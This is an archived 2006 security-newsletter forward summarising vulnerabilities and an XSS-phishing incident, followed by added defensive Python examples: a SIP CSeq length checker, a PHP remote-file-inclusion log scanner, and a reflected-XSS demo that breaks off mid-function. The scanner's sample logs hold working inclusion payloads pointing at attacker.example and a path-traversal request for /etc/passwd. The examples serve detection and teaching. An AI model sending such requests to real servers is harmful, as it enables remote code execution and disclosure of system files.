Archive :: Security-alerts
Security-Alerts mailing list archive (security-alerts@yandex-team.ru)


[security-alerts] FW: @RISK: The Consensus Security Vulnerability Alert Vol. 5 No. 27



> 
> This week's biggest and most critical new vulnerability is one that
> affects VOIP and AOL Triton and other important internet services (#1
> below).  The software's largely unknown name, SipXtapi, belies the
> breadth of its use, and the vulnerability can be exploited very simply.
> Also at risk this week are users of Microsoft Internet Explorer, Excel
> and Windows Explorer. (#2, #5, and #6 below)
> 

> *************************
> Widely-Deployed Software
> *************************
> 
> (1) CRITICAL: SIPfoundry sipXtapi Buffer Overflow
> Affected:
> sipXtapi library versions compiled before 24-Mar-2006
> PingTel products compiled against those versions of the library
> AOL Triton products compiled against those versions of the library
> 
> Details: SIPfoundry is an international software community dedicated to
> accelerating the adoption of SIP (Session Initiation Protocol)-based
> VoIP solutions. One of SIPfoundry's products, the sipXtapi library, is
> used by multiple cross-platform VoIP applications. This library contains
> a buffer overflow that can be triggered by sending a "CSeq" SIP header
> field larger than 24 bytes. An attacker can exploit the flaw to execute
> arbitrary code with the privileges of the user running the affected
> application. Note that several common user applications, including AOL's
> Triton messaging application, are compiled using vulnerable versions of
> the library. Exploit code for this vulnerability has been publicly
> posted.
> 
> Status: SIPfoundry confirmed, updates available. Updates from PingTel
> and AOL are also available.
> 
> References:
> Posting by Michael Thumann
> http://archives.neohapsis.com/archives/fulldisclosure/2006-07/0160.html
> SIPfoundry sipXtapi Home Page
> http://www.sipfoundry.org/sipXtapi/index.html 
> SIPfoundry Home Page
> http://www.sipfoundry.org/
> SecurityFocus BID
> http://www.securityfocus.com/bid/18906
>    
> ****************************************************************
> 
> (2) HIGH:  Internet Explorer "Internet.HHCtrl" ActiveX Heap Overflow
> Affected:
> Microsoft Windows XP Service Pack 2; other versions may be affected
> 
> Details: Internet Explorer contains a heap-based buffer overflow that
> can be triggered after instantiating the Windows Help and Support
> ActiveX control (hhctrl.ocx). The problem arises because setting the
> "Image" property of this ActiveX component results in a small heap
> overflow. A malicious webpage or an HTML email may exploit the flaw to
> execute arbitrary code with the privileges of the logged-on user. The
> technical details along with a proof-of-concept have been publicly
> posted.  This flaw was reported by a researcher who plans to release a
> new flaw everyday for the month of July in various browsers. The
> researcher has also reported other DoS vulnerabilities in IE.
> 
> Status: Microsoft has not confirmed, no updates available. A workaround
> is to set the killbit for the hhctrl.ocx ActiveX control with the
> following UUID: 41B23C28-488E-4E5C-ACE2-BB0BBABE99E8. Note that Windows
> Help and Support Center may not function properly if this kill bit is
> set.
> 
> Council Site Actions:  All responding council sites are waiting on
> additional information from the vendor.
> 
> References:
> Browser Fun Posting by H.D. Moore
> http://browserfun.blogspot.com/ 
> http://browserfun.blogspot.com/2006/07/mobb-2-internethhctrl-image-property.html
> SecurityFocus BID
> http://www.securityfocus.com/bid/18769 
> 
> ****************************************************************
> 
> (5) MODERATE: Microsoft Excel "Style" Processing Overflow (0-day)
> Affected:
> Microsoft Excel 2000/XP/2003 (Asian languages editions only)
> 
> Details: Another 0-day buffer overflow vulnerability has been reported
> in versions of Microsoft Excel localized into certain Asian languages
> (e.g. Chinese). The overflow is triggered by an Excel document with an
> overlong "style" string. By tricking a user into opening a
> specially-crafted file, an attacker could execute arbitrary code with
> the privileges of the logged-on user. However, user interaction is
> required to exploit this flaw. In case of Excel XP and 2003, the user
> must repair the document using Excel's repair feature whereas Excel 2000
> requires that the user click on the "Style" option. A proof-of-concept
> has been publicly posted.
> 
> Status: Microsoft has not confirmed, no updates available.
> 
> Council Site Actions: responding council sites are waiting on additional
> information from the vendor.
> 
> References:
> Posting by nanika
> http://archives.neohapsis.com/archives/bugtraq/2006-07/0034.html 
> Proof-of-Concept
> http://www.hitcon.org/Nanika.xls  
> SecurityFocus BID
> http://www.securityfocus.com/bid/18872 
> 
> ****************************************************************
> 
> (6) LOW: Microsoft Windows Explorer URL File Format Overflow
> Affected:
> Microsoft Windows XP/2003
> 
> Details: Microsoft Windows Explorer, the primary user interface shell
> for the Microsoft Windows operating system, is prone to a file format
> vulnerability during the parsing of "Internet Shortcut" (.url) files.
> By tricking a user into viewing a folder containing a specially-crafted
> shortcut file, an attacker can crash the Windows Explorer session. It
> is currently unknown as to whether code execution is possible. Note that
> only viewing the folder containing the shortcut file is necessary;
> therefore, simply placing the shortcut file on the desktop or clicking
> a link to a shared folder containing such a file is all that is
> necessary for exploitation.
> 
> Status: Microsoft has not confirmed, no updates available. 
> 
> Council Site Actions: responding council sites are waiting on additional
> information from the vendor.
> 
> References:
> Posting by nanika@xxxxxxxxxx:
> http://archives.neohapsis.com/archives/bugtraq/2006-07/0055.html
> SecurityFocus BID
> Not yet available.
> 
> **************
> Other Software
> **************
> 
> (7) HIGH: Multiple Products PHP File Inclusion Vulnerabilities
> Affected:
> vBulletin version 3.5.4 and prior
> Mambo Galleria Module version 1.0 and prior
> WebDesignHQ SiteBuilder-FX version 3.x
> Stud.IP versions 1.3.0-2 and prior
> BLOG:CMS versions 4.1.0 and prior
> Plume-CMS version 1.0.4 and prior
> TWiki versions 01-Dec-2000 and later
> 
> Description: The following popular software packages reportedly contain
> PHP remote file include vulnerabilities: vBulletin, Mambo Galleria,
> WebDesignHQ, Stud.IP, BLOG:CMS, Plume-CMS, and TWiki. These flaws can
> be exploited by a remote attacker to run arbitrary PHP code on the
> webserver hosting the vulnerable software packages. The postings show
> how to craft the malicious HTTP requests to exploit the flaws.
> 
> Status:
> vBulletin has not confirmed, no updates available.
> Mambo has not confirmed, no updates available.
> SiteBuilder has not confirmed, no updates available.
> Stud.IP has not confirmed, no updates available.
> BLOG:CMS has not confirmed, no updates available.
> Plume-CMS has not confirmed, no updates available.
> TWiki confirmed, updates available.
> 
> Note that, with the exception of the TWiki vulnerability, all of these
> vulnerabilities require that the PHP "register_globals" option be
> enabled. The "register_globals" option is disabled by default in PHP
> version 4.2.0 and later. However, many sites enable this option, and at
> least the Stud.IP package requires that this option be enabled. Users
> are advised to disable the "register_globals" option if possible, and
> run web server software under a low-privilege account.
> 
> Council Site Actions: The affected software and/or configuration are not
> in production or widespread use, or are not officially supported at any
> of the council sites. They reported that no action was necessary.
> 
> References:
> PLDsoft Posting by M4K3 (vBulletin)
> http://www.pldsoft.com/forum/showthread.php?t=1340 
> Posting by CarcaBotx (vBulletin)
> http://archives.neohapsis.com/archives/bugtraq/2006-07/0061.html 
> vBulletin Home Page
> http://www.vbulletin.com/ 
> Posting by ineal (Mambo Galleria)
> http://archives.neohapsis.com/archives/bugtraq/2006-07/0044.html 
> Mambo Home Page
> http://www.mamboserver.com/ 
> SecurityFocus BID (Mambo Galleria)
> http://www.securityfocus.com/bid/18808 
> Secunia Security Advisory (SiteBuilder-FX)
> http://secunia.com/advisories/20923/ 
> WebDesignHQ Home Page
> http://www.webdesignhq.com/ 
> Posting by Hamid Ebadi (Stud.IP)
> http://securitytracker.com/alerts/2006/Jun/1016418.html 
> Stud.IP Home Page
> http://www.studip.de/ 
> Posting by Ellipsis Security (BLOG:CMS)
> http://archives.neohapsis.com/archives/bugtraq/2006-07/0058.html 
> BLOG:CMS Home Page
> http://www.blogcms.com/ 
> SecurityFocus BID (BLOG:CMS)
> http://www.securityfocus.com/bid/18837 
> Posting by KARKOR23 (Plume-CMS)
> http://archives.neohapsis.com/archives/bugtraq/2006-07/0025.html 
> Plume-CMS Home Page
> http://www.plume-cms.net
> SecurityFocus BID (Plume-CMS)
> http://www.securityfocus.com/bid/18780 
> Posting by Peter Thoeny (TWiki)
> http://archives.neohapsis.com/archives/vulnwatch/2006-q3/0003.html
> TWiki Security Advisory
> http://twiki.org/cgi-bin/view/Codev/SecurityAlertSecureFileUploads
> TWiki Home Page
> http://twiki.org/ 
> 
> ****************************************************************
> 
> (8) HIGH: Multiple Products SQL Injection Vulnerabilities
> Affected:
> BLOG:CMS version 4.1.0 and possibly prior
> Invision Power Board versions 1.x, 2.x, and 3.x Final
> Kyberna AG ky2help 3.2 and possibly others
> 
> Details: Multiple web-based applications contain SQL injection
> vulnerabilities. Each of these attacks would allow complete access to
> the database providing backend services to the affected application.
> Depending on configuration, access could also be granted to other
> databases or to the hosting system. With the exception of the ky2help
> vulnerability, none of these attacks require authentication. The
> BLOG:CMS vulnerability requires that the "magic_quotes_gpc" PHP option
> be disabled; it is enabled by default.
> 
> Status:
> BLOG:CMS has not confirmed, no updates available.
> Invision Power Board has not confirmed, no updates available.
> Kyberna has confirmed, updates available.
> 
> Council Site Actions: The affected software and/or configuration are not
> in production or widespread use, or are not officially supported at any
> of the council sites. They reported that no action was necessary.
> 
> References:
> Posting by Ellipsis Security (BLOG:CMS)
> http://archives.neohapsis.com/archives/bugtraq/2006-07/0058.html 
> BLOG:CMS Home Page
> http://www.blogcms.com/ 
> SecurityFocus BID (BLOG:CMS)
> http://www.securityfocus.com/bid/18839 
> Posting by Crazy.Cracker (Invision Power Board)
> http://archives.neohapsis.com/archives/bugtraq/2006-07/0052.html 
> Posting by Breeeeh (Invision Power Board)
> http://archives.neohapsis.com/archives/bugtraq/2006-07/0032.html 
> Invision Power Board Home Page
> http://www.invisionboard.com/ 
> SecurityFocus BID (Invision Power Board)
> http://www.securityfocus.com/bid/18839 
> SCIP Advisory (ky2help)
> http://archives.neohapsis.com/archives/bugtraq/2006-07/0043.html 
> http://www.scip.ch/cgi-bin/smss/showadvf.pl?id=2351   
> Kyberna Home Page
> http://www.kyberna.com 
> SecurityFocus BID (ky2help)
> http://www.securityfocus.com/bid/18800 
> 
> ****************************************************************
> 
> **********
> Exploits
> **********
> 
> (11) Microsoft Word HLINK.DLL Exploit
> 
> Description: The Microsoft Windows HLINK.DLL vulnerability described in
> a previous @RISK newsletter posting has a new exploit available that
> uses Word as an attack vector. The previously posted exploits used
> Microsoft Excel as an attack vector. Note that user interaction is still
> required to leverage the flaw. Users are advised to not open documents
> from untrusted sources.
> 
> References:
> Posting by "SYS 49152"
> http://archives.neohapsis.com/archives/fulldisclosure/2006-07/0152.html
> Previous @RISK Newsletter Posting
> http://www.sans.org/newsletters/risk/display.php?v=5&i=25#widely3 
> 
> ****************************************************************
> 06.27.1 CVE: Not Available
> Platform: Windows
> Title: Microsoft Internet Explorer HHCtrl ActiveX Control Memory
> Corruption
> Description: Internet Explorer is exposed to a memory corruption
> vulnerability. This is related to the handling of the Internet.HHCtrl
> image property, which results in heap memory corruption. Internet
> Explorer versions 6.0 SP1 and earlier are affected.
> Ref:
> http://browserfun.blogspot.com/2006/07/mobb-2-internethhctrl-image-property.html
> ______________________________________________________________________
> 
> 06.27.2 CVE: Not Available
> Platform: Windows
> Title: Internet Explorer Structured Graphics Control Denial of Service
> Description: Microsoft Internet Explorer is exposed to a denial of
> service issue. It fails to handle malicious ActiveX controls properly.
> This issue is triggered when an attacker convinces a victim user to
> activate a malicious ActiveX control. Microsoft Internet Explorer 6.0
> versions SP2 and earlier are affected.
> Ref:
> http://browserfun.blogspot.com/2006/07/mobb-6-structuredgraphicscontrol.html
> ______________________________________________________________________
> 
> 06.27.3 CVE: CVE-2006-3059
> Platform: Microsoft Office
> Title: Excel Style Handling and Repair Remote Code Execution
> Description: Microsoft Excel is vulnerable to a remote code execution
> issue due to insufficient handling of malformed XLS files that contain
> long styles. Visit the referenced link for further details.
> Ref: http://www.securityfocus.com/bid/18872
> ______________________________________________________________________
> 
> 06.27.4 CVE: Not Available
> Platform: Other Microsoft Products
> Title: Internet Explorer 7 Denial of Service
> Description: Microsoft Internet Explorer 7 is vulnerable to a denial
> of service issue when parsing HTML content containing numerous nested
> "applet" tags. Microsoft Internet Explorer versions 7.0 beta3 and
> earlier are vulnerable.
> Ref: http://www.securityfocus.com/archive/1/438754
> ______________________________________________________________________
> 
> 06.27.5 CVE: Not Available
> Platform: Other Microsoft Products
> Title: Microsoft Internet Explorer OutlookExpress.AddressBook Denial
> of Service
> Description: Internet Explorer is prone to a denial of service
> vulnerability. This issue occurs when the browser loads a non-ActiveX
> COM object. Reports indicate that the "OutlookExpress.AddressBook" COM
> object may be used to trigger this issue.
> Ref: http://www.securityfocus.com/bid/18771
> ______________________________________________________________________
> 
> 06.27.6 CVE: Not Available
> Platform: Other Microsoft Products
> Title: Internet Explorer Href Title Denial of Service
> Description: Microsoft Internet Explorer is prone to a denial of
> service issue due to an error in processing a HTML "href" tag with a
> title that is larger than one thousand characters. Please see the
> attached advisory for details.
> Ref: http://www.securityfocus.com/bid/18820/info
> ______________________________________________________________________
> 
> 06.27.7 CVE: Not Available
> Platform: Other Microsoft Products
> Title: Internet Explorer Explorer.exe Denial of Service
> Description: Microsoft Internet Explorer is vulnerable to a denial of
> service issue because the application fails to handle malicious ".url"
> files properly while parsing the URI file. All versions of Microsoft
> Internet Explorer are vulnerable.
> Ref: http://www.securityfocus.com/archive/1/439153
> ______________________________________________________________________
> 
> 06.27.8 CVE: Not Available
> Platform: Other Microsoft Products
> Title: Microsoft Internet Explorer Table Frameset Denial of Service
> Description: Internet Explorer is prone to a denial of service
> vulnerability. The attacker supplied code at the attacker's site will
> cause Internet Explorer to create a Frameset inside a Table using the
> "appendChild" function. This can lead to dereferencing a NULL pointer.
> As a result, Internet Explorer will crash, effectively denying service
> to legitimate users.
> Ref: http://www.securityfocus.com/bid/18873
> ______________________________________________________________________
> 
> 06.27.10 CVE: Not Available
> Platform: Third Party Windows Apps
> Title: PatchLink Update Server Arbitrary File Overwrite
> Description: PatchLink Update Server is a patch and vulnerability
> management solution. It is vulnerable to a remote file overwrite issue
> due to insufficient sanitization of user-supplied input to the
> "nwupload.asp" script. PatchLink Update versions 6.2 and earlier are
> vulnerable.
> Ref: http://www.securityfocus.com/archive/1/438710
> ______________________________________________________________________
> 
> 06.27.11 CVE: Not Available
> Platform: Third Party Windows Apps
> Title: Internet Explorer ADODB.Recordset Filter Property Denial of
> Service
> Description: Microsoft Internet Explorer is vulnerable to a denial of
> service issue when the browser loads a non-ActiveX COM object.
> Microsoft Internet Explorer versions 6.0 SP1 and 6.0 are vulnerable.
> Ref:
> http://browserfun.blogspot.com/2006/07/mobb-1-adodbrecordset-filter-property.html
> ______________________________________________________________________
> 
> 06.27.12 CVE: Not Available
> Platform: Third Party Windows Apps
> Title: Zone Labs ZoneAlarm Registry Key Local Denial of Service
> Description: Zone Labs ZoneAlarm Internet Security Suite is a security
> software package. It is exposed to a denial of service vulnerability
> due to a failure in the application to properly handle exceptional
> conditions. ZoneAlarm Security Suite versions 6.5.722 and 6.1.737 are
> affected.
> Ref:
> http://www.matousec.com/info/advisories/ZoneAlarm-Insufficient-protection-of-registry-key-VETFDDNT-Enum.php
> ______________________________________________________________________
> 
> 06.27.15 CVE: Not Available
> Platform: Third Party Windows Apps
> Title: RARLAB WinRAR Self-Extracting Archive Buffer Overflow
> Description: RARLAB WinRAR is a compression utility capable of reading
> and writing files using several different archival formats. It is
> prone to a client side buffer overflow vulnerability. This issue
> arises when processing a malicious self extracting archive (.sfx) file
> having a large comment as part of the archive. WinRAR versions 3.60
> and earlier are affected.
> Ref: http://www.securityfocus.com/bid/18851
> ______________________________________________________________________
> 
> 06.27.22 CVE: Not Available
> Platform: Linux
> Title: Linux Kernel Netfilter Conntrack_Proto_SCTP.C Denial of Service
> Description: The Linux kernel netfilter module is prone to a denial of
> service vulnerability. The problem occurs in the
> "ipv4/netfilter/ip_conntrack_proto_sctp.c" and
> "netfilter/nf_conntrack_proto_sctp.c" scripts. Specifically, when a
> packet without any chunks is received the newconntrack variable in
> sctp_packet contains an out of bounds value. That value is used to
> look up a pointer from the array of timeouts, which is then
> dereferenced. This results in a crash.
> Ref: http://www.securityfocus.com/bid/18755
> ______________________________________________________________________
> 
> 
> 06.27.24 CVE: CVE-2006-2935
> Platform: Linux
> Title: Linux Kernel CD-ROM Driver Local Buffer Overflow
> Description: The Linux kernel is susceptible to a local buffer
> overflow issue. It fails to properly bounds check user-supplied input
> before using it in a memory copy operation. Linux kernel versions
> 2.6.17.3 and earlier are affected.
> Ref: http://www.securityfocus.com/bid/18847
> ______________________________________________________________________
> 
> 06.27.29 CVE: Not Available
> Platform: Unix
> Title: Linux Kernel PRCTL Core Dump Handling Privilege Escalation
> Description: Linux kernel is exposed to a local privilege escalation
> issue. This issue affects "prctl" because the application handles core
> dump files in an insecure manner. Linux kernel versions 2.6.17.3 and
> earlier are vulnerable.
> Ref: http://rhn.redhat.com/errata/RHSA-2006-0574.html
> ______________________________________________________________________
> 
> 06.27.30 CVE: Not Available
> Platform: Cross Platform
> Title: Opera Document Stylesheet Denial of Service
> Description: Opera is exposed to a denial of service issue due to a
> failure in the application to properly handle user-supplied input.
> Opera Web Browser version 9 is affected.
> Ref: http://www.securityfocus.com/archive/1/438872
> ______________________________________________________________________
> 
> 06.27.31 CVE: Not Available
> Platform: Cross Platform
> Title: LibWMF WMF File Handling Integer Overflow
> Description: LibWMF is a library that allows for reading and
> manipulation of Windows Metafile Format (WMF) files. It is vulnerable
> to an integer overflow issue in the "wmf_header_read()" function.
> LibWMF versions 0.2.8.4 and earlier are vulnerable.
> Ref: http://www.securityfocus.com/archive/1/438803
> ______________________________________________________________________
> 
> 06.27.33 CVE: Not Available
> Platform: Cross Platform
> Title: PatchLink Update Server Proxyreg.ASP Authentication Bypass
> Description: PatchLink Update Server is a patch and vulnerability
> management solution for medium and large enterprise networks. It is
> susceptible to a remote authentication bypass vulnerability due to
> improper verification of authentication credentials in the
> "proxyreg.asp" script. Malicious servers may be added to this proxy
> server list by a malicious user, which may then be used to distribute
> malicious code to unsuspecting roaming PatchLink client computers.
> Ref: http://www.securityfocus.com/bid/18723
> ______________________________________________________________________
> 
> 06.27.35 CVE: Not Available
> Platform: Cross Platform
> Title: Mozilla Firefox OuterHTML Redirection Handling Information
> Disclosure
> Description: Mozilla Firefox is exposed to an information disclosure
> vulnerability because it fails to properly enforce cross domain
> policies. Please refer to link below for further details. Mozilla
> Firefox version 1.5 beta 2 and earlier are affected.
> Ref: http://www.securityfocus.com/bid/18734/info
> ______________________________________________________________________
> 
> 06.27.36 CVE: CVE-2006-2199
> Platform: Cross Platform
> Title: OpenOffice Java Applet System Unauthorized Access
> Description: OpenOffice is a multiplatform office suite. It is
> vulnerable to an unauthorized access issue that allows a malicious
> Java applet to escape the sandbox and gain unauthorized access to a
> computer. OpenOffice version 2.0.3 resolves this issue.
> Ref: http://www.openoffice.org/security/CVE-2006-2199.html
> ______________________________________________________________________
> 
> 06.27.37 CVE: Not Available
> Platform: Cross Platform
> Title: OpenOffice Arbitrary Macro Execution
> Description: OpenOffice is prone to a macro code injection
> vulnerability that allows attackers to gain unauthorized access to a
> vulnerable computer. This issue is due to a failure in the application
> to properly secure macros embedded in malicious documents, and does
> not require user interaction beyond accessing the file.
> Ref: http://www.securityfocus.com/bid/18738
> ______________________________________________________________________
> 
> 06.27.38 CVE: Not Available
> Platform: Cross Platform
> Title: OpenOffice XML File Format Buffer Overflow
> Description: OpenOffice is a multiplatform office suite. It is
> affected by an XML file format buffer overflow issue that allows
> attackers to gain unauthorized access to a vulnerable machine. Please
> see the attached advisory for a list of affected versions.
> Ref: http://www.openoffice.org/security/CVE-2006-3117.html
> ______________________________________________________________________
> 
> 06.27.39 CVE: CVE-2006-0468
> Platform: Cross Platform
> Title: Communigate Pro Server Pop Denial of Service
> Description: CommuniGate Pro is an Internet messaging server. It is
> vulnerable to an unspecified denial of service issue. CommuniGate Pro
> Server versions 5.x are vulnerable.
> Ref: http://www.stalker.com/CommuniGatePro/History.html
> ______________________________________________________________________
> 
> 06.27.42 CVE: Not Available
> Platform: Cross Platform
> Title: Gimp XCF_load_vector Function Buffer Overflow
> Description: Gimp is a free image manipulation application. The
> "xcf_load_vector()" function is vulnerable to a buffer overflow when
> the application processes a malicious image file. GIMP versions 2.2.11
> and earlier are vulnerable.
> Ref: http://bugzilla.gnome.org/show_bug.cgi?id=346742
> ______________________________________________________________________
> 
> Bonus Section: Lessons Learned The Hard Way in Web Application
> Vulnerabilities  (a special section by SPI Dynamics).
> 
> XSS Plus Phishing Comes of Age
> Last month, Paypal was hit with an emerging trend in phishing scams. An
> attacker used a Cross Site Scripting (XSS) vulnerability in paypal.com
> to inject their own HTML into web pages served from Paypal. By coupling
> phishing techniques with a web application vulnerability, the attacker
> created a phishing scenario that appeared legitimate and circumvented
> traditional anti-phishing defenses.
> 
> The attack started with a mass email telling people they needed to update
> their Paypal account information. The email contained a link to
> paypal.com, with an XSS attack embedded in the URL. Unlike traditional
> phishing attacks which link to a fake website and attempt to hide the
> URL, this email did in fact link to the actual paypal.com host. When the
> user clicked on the link they visited an SSL-encrypted page on Paypal's
> site. Checking the hostname, the SSL certificate, or other common
> anti-phishing techniques all led a victim to believe they were safe.
> By injecting their own HTML into the web page through the XSS
> vulnerability, the attacker was able to present anything they wanted to
> a victim and make them believe it was from Paypal. In this case, the
> injected HTML simply informed the user their account was deactivated and
> used JavaScript to redirect them to a 3rd party website where the actual
> information theft occurred.
> 
> Paypal was extremely lucky that the XSS vulnerability wasn't properly
> exploited. The phisher could have injected a fake login form, added a
> keylogger, or completely rewritten the entire page with anything they
> wanted. XSS vulnerabilities can even be used to launch self-propagating
> worms like the Yamanner worm or the MySpace.com worm. Instead the
> phisher merely redirected the victim to a 3rd party website just like a
> classic phishing attack.
> 
> SPI Labs has been researching how XSS can amplify phishing attacks for
> quite some time. One of our researchers, Billy Hoffman, gave a well
> received presentation entitled "The Phuture of Phishing" at the Toorcon
> Security conference in September 2005. This presentation includes an
> extensive guide on how to properly secure applications against XSS. SPI
> Labs has also created and released LineBreaker, a proxy that detects and
> stops XSS+Phishing attacks. Both the presentation and program are
> available at
> http://www.spidynamics.com/spilabs/education/presentations/phishing.html
> 
> What should you take away from all of this? Simple. XSS can greatly
> amplify the damage of a phishing attack by circumventing traditional
> defenses. XSS can have a number of very dangerous payloads, any one of
> which can steal personal information. Fortunately, XSS is also 100%
> preventable if developers perform proper input validation.
> 
> 
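Item (1) of the forwarded newsletter gives one concrete trigger condition for the sipXtapi flaw: a CSeq header field larger than 24 bytes. The Python below is an added example, not sipXtapi or SIPfoundry code, that parses the header block of a SIP message and reports whether any CSeq value exceeds that limit. The sample messages, hosts and addresses are constructed for the example. It joins RFC 3261 folded continuation lines (a header value may be split across lines that begin with SP or HTAB) before measuring, because the receiver treats the folded lines as one value and a check that only measures the first line would undercount.

```python
import re
from typing import Dict, List, Tuple

CSEQ_LIMIT = 24  # bytes; the advisory's trigger is a CSeq field larger than this


def parse_sip_headers(message: str) -> List[Tuple[str, str]]:
    """Return (lowercased name, value) pairs from a SIP message's header block.

    Accepts CRLF or bare LF line endings, stops at the first empty line (start of
    the body), and joins RFC 3261 folded lines (continuations starting with SP/HTAB).
    """
    head = re.split(r"\r?\n\r?\n", message, maxsplit=1)[0]
    lines = re.split(r"\r?\n", head)
    headers: List[Tuple[str, str]] = []
    for line in lines[1:]:                 # lines[0] is the request/status line
        if not line:
            continue
        if line[0] in " \t" and headers:   # folded continuation of previous header
            name, value = headers[-1]
            headers[-1] = (name, value + " " + line.strip())
            continue
        name, sep, value = line.partition(":")
        if not sep:
            continue                       # not a header line; skip rather than guess
        headers.append((name.strip().lower(), value.strip()))
    return headers


def check_cseq(message: str) -> Dict[str, object]:
    """Measure every CSeq value in bytes and flag the message if any exceeds CSEQ_LIMIT."""
    values = [v for n, v in parse_sip_headers(message) if n == "cseq"]
    if not values:
        return {"verdict": "no-cseq", "longest": 0, "count": 0}
    longest = max(len(v.encode("utf-8")) for v in values)
    return {
        "verdict": "oversized" if longest > CSEQ_LIMIT else "ok",
        "longest": longest,
        "count": len(values),
    }


# Constructed sample messages (RFC 5737 documentation addresses, example.* hosts).
BENIGN = (
    "INVITE sip:bob@example.net SIP/2.0\r\n"
    "Via: SIP/2.0/UDP 192.0.2.10:5060;branch=z9hG4bKnashds8\r\n"
    "From: <sip:alice@example.org>;tag=1928301774\r\n"
    "To: <sip:bob@example.net>\r\n"
    "Call-ID: a84b4c76e66710@192.0.2.10\r\n"
    "CSeq: 314159 INVITE\r\n"
    "Content-Length: 0\r\n\r\n"
)
# 47-byte CSeq value: well past the 24-byte limit.
OVERSIZED = (
    "INVITE sip:bob@example.net SIP/2.0\r\n"
    "Via: SIP/2.0/UDP 192.0.2.10:5060;branch=z9hG4bKnashds8\r\n"
    "CSeq: " + "9" * 40 + " INVITE\r\n"
    "Content-Length: 0\r\n\r\n"
)
# Same trick hidden behind line folding: "CSeq: 1" looks harmless on its own line.
FOLDED = (
    "INVITE sip:bob@example.net SIP/2.0\r\n"
    "Via: SIP/2.0/UDP 192.0.2.10:5060;branch=z9hG4bK776asdhds\r\n"
    "CSeq: 1\r\n"
    "\t" + "A" * 30 + "\r\n"
    "Content-Length: 0\r\n\r\n"
)

if __name__ == "__main__":
    for label, msg in (("benign", BENIGN), ("oversized", OVERSIZED), ("folded", FOLDED)):
        print(label, check_cseq(msg))
```

Measuring in bytes rather than characters matters when the value is not ASCII; a fixed-size C buffer counts bytes. The same parse-then-measure shape works for any other header whose length an advisory bounds.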

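Item (7) of the newsletter describes PHP remote file inclusion flaws exploited through crafted HTTP requests and advises disabling register_globals. As an added example, not code from any of the projects listed there, the Python below scans constructed Apache-style access log lines for query parameters whose decoded value is a remote URL (the usual signature of an RFI attempt, including percent- and double-percent-encoded forms) and audits a php.ini text for register_globals being left on. The parameter names, hosts, paths and timestamps are made up for the example, and the detection is generic rather than tied to any product named above.

```python
import re
from urllib.parse import parse_qsl, unquote, urlsplit

# Apache common/combined log prefix; only the client IP and the request line are used.
LOG_LINE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) (?P<proto>HTTP/[\d.]+)"'
)
# A parameter value that names a remote resource is what an include() must never see.
REMOTE_SCHEME = re.compile(r'^(?:https?|ftp)://', re.IGNORECASE)


def rfi_parameters(target):
    """Query parameters of a request target whose decoded value is a remote URL."""
    hits = []
    for name, value in parse_qsl(urlsplit(target).query, keep_blank_values=True):
        decoded = unquote(value)  # parse_qsl decoded once; a second pass catches %25-encoding
        if REMOTE_SCHEME.match(decoded.lstrip()):
            hits.append((name, decoded))
    return hits


def scan_log(lines):
    """Return one finding per (request, parameter) that carries a remote URL."""
    findings = []
    for line in lines:
        m = LOG_LINE.match(line)
        if not m:
            continue
        for name, value in rfi_parameters(m.group("target")):
            findings.append({
                "ip": m.group("ip"),
                "path": urlsplit(m.group("target")).path,
                "param": name,
                "value": value,
            })
    return findings


def register_globals_enabled(ini_text):
    """True if php.ini text leaves register_globals on.

    The last assignment wins, ';' starts a comment, keys are case-insensitive and
    PHP accepts On/1/True/Yes (optionally quoted) as truthy.
    """
    enabled = False
    for raw in ini_text.splitlines():
        line = raw.split(";", 1)[0].strip()
        m = re.match(r'register_globals\s*=\s*(.*)$', line, re.IGNORECASE)
        if m:
            enabled = m.group(1).strip().strip('"\'').lower() in ("on", "1", "true", "yes")
    return enabled


# Constructed log lines (RFC 5737 addresses, example.* hosts, invented paths).
SAMPLE_LOG = [
    '198.51.100.7 - - [10/Jul/2006:11:02:13 +0000] "GET /gallery/index.php?page=list HTTP/1.1" 200 5120 "-" "Mozilla/4.0"',
    '203.0.113.9 - - [10/Jul/2006:11:02:40 +0000] "GET /gallery/index.php?page=http://attacker.example/shell.txt? HTTP/1.1" 200 318 "-" "libwww-perl/5.805"',
    '203.0.113.9 - - [10/Jul/2006:11:02:41 +0000] "GET /cms/index.php?inc=http%3A%2F%2Fattacker.example%2Fcmd.txt%3F HTTP/1.1" 200 318 "-" "libwww-perl/5.805"',
    '203.0.113.9 - - [10/Jul/2006:11:02:42 +0000] "GET /cms/index.php?template=%2568ttp%253A%252F%252Fattacker.example%252Fx.txt HTTP/1.1" 200 318 "-" "libwww-perl/5.805"',
    '198.51.100.7 - - [10/Jul/2006:11:03:01 +0000] "POST /cms/login.php HTTP/1.1" 302 0 "-" "Mozilla/4.0"',
    '203.0.113.9 - - [10/Jul/2006:11:03:20 +0000] "GET /cms/index.php?page=../../../../etc/passwd HTTP/1.1" 404 212 "-" "libwww-perl/5.805"',
]

if __name__ == "__main__":
    for f in scan_log(SAMPLE_LOG):
        print(f"{f['ip']} {f['path']} {f['param']}={f['value']}")
    print("register_globals on:", register_globals_enabled("register_globals = On\n"))
```

The last sample line (a path traversal) is deliberately not flagged: local file inclusion is a different bug with a different signature, and a detector that conflates the two produces noisier triage. The trailing "?" on the remote URLs is included because that is how an attacker neutralises whatever the vulnerable include() appends to the path.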

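The bonus section's point is that the phishing link pointed at the real paypal.com host over SSL, so hostname and certificate checks passed and only the server-side handling of the injected parameter could have stopped it. The Python below is an added example, not SPI Labs' or PayPal's code, showing that reflected-parameter pattern in a minimal page renderer beside a version that encodes the value for the HTML context it lands in (element text and a quoted attribute). The host, URL path, payload and page template are constructed for the example; the payload mirrors the incident described above, injected HTML that announces a deactivated account and a script that redirects to a third-party site.

```python
import html
from urllib.parse import parse_qs, quote, urlsplit

# Hypothetical account-update page on the legitimate host (constructed for this example).
LEGITIMATE_HOST = "www.example.com"
PAGE_TEMPLATE = (
    "<html><body><h1>Account update</h1>"
    "<p>Hello, {name_text}.</p>"
    "<a href=\"/profile?u={name_attr}\">Your profile</a>"
    "</body></html>"
)


def _name_from(request_url: str) -> str:
    """The 'name' query parameter the page reflects (parse_qs percent-decodes it)."""
    query = parse_qs(urlsplit(request_url).query, keep_blank_values=True)
    return query.get("name", [""])[0]


def render_vulnerable(request_url: str) -> str:
    """Reflects the parameter verbatim: any HTML carried in the link is served by the real site."""
    name = _name_from(request_url)
    return PAGE_TEMPLATE.format(name_text=name, name_attr=name)


def render_hardened(request_url: str) -> str:
    """Same page, with the value encoded per context: text content needs <, >, & escaped;
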